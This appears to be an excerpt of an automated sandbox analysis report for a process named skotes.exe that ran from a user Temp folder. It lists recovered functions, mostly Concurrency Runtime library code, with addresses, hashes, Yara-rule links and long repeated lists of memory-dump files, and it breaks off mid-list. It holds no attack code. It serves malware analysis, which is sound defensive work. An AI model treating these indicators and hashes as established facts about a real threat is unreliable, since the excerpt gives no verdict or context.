Function 009833C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 009833DB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 009833EF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00983407
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0098341F

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 77fe3ea2a4618ad2bf156571f2976c11d4db2571f1d02d09804b3db2c8488341
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: DA01A232600514A7CB16FA648841AAF77ADAF84B50F108455FD16AB392DA71EE0197A0

Function 00979510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00979519

Part of subcall function 0096F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00975486

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0097953D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00979550
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00979559

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction ID: 187d1185731d8bfcc02d2a7cc9061027383a0f0db2f8782457db13d9678975f0
Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction Fuzzy Hash: E6F0A072200B205FE662AB688812F6B23D9DFC0711F00C81DF81F9B682CE24E842CB81

Function 0096EFCD Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 0096EFD1

Part of subcall function 0096F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0096F989
Part of subcall function 0096F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0096F9C0
Part of subcall function 0096F968: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0096F9CC

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0096EFDD

Part of subcall function 0096F40F: Concurrency::critical_section::unlock.LIBCMT ref: 0096F433

Concurrency::Context::Block.LIBCONCRT ref: 0096EFE2

Part of subcall function 00970366: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00970368

Concurrency::critical_section::lock.LIBCONCRT ref: 0096F002

Part of subcall function 0096F891: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0096F8AC
Part of subcall function 0096F891: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0096F8B7

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 811866635-0
Opcode ID: 079b592f091a133168d318425ebed1afe4f9b1edbcf8c94ebcacfa8b1454c9ce
Instruction ID: 0e39379e16833267008e8e5402562c863b8b2fda45f32b6e9e50cca1900ec7f0
Opcode Fuzzy Hash: 079b592f091a133168d318425ebed1afe4f9b1edbcf8c94ebcacfa8b1454c9ce
Instruction Fuzzy Hash: 29E04F35A01605ABCB08FB24D46576DBB61BFC5360B148369E4B6172E2CF346E46CB85

Function 0098DFE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 0098DFE8

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
API String ID: 0-1793179972
Opcode ID: 145fb494060150a3bf394bf3d80e695ff361941063bcfaba6405a43026eca3f5
Instruction ID: f1f21242e0764168c9f45352a5b1411309235118526683379fffadaa7548395d
Opcode Fuzzy Hash: 145fb494060150a3bf394bf3d80e695ff361941063bcfaba6405a43026eca3f5
Instruction Fuzzy Hash: C3219271608209BFAB30BE659C90E6BB7ADAF413647204914F93897351EB71EC008760

Function 00981704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00981764
std::invalid_argument::invalid_argument.LIBCONCRT ref: 009817AF

Strings

pContext, xrefs: 009817A7

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
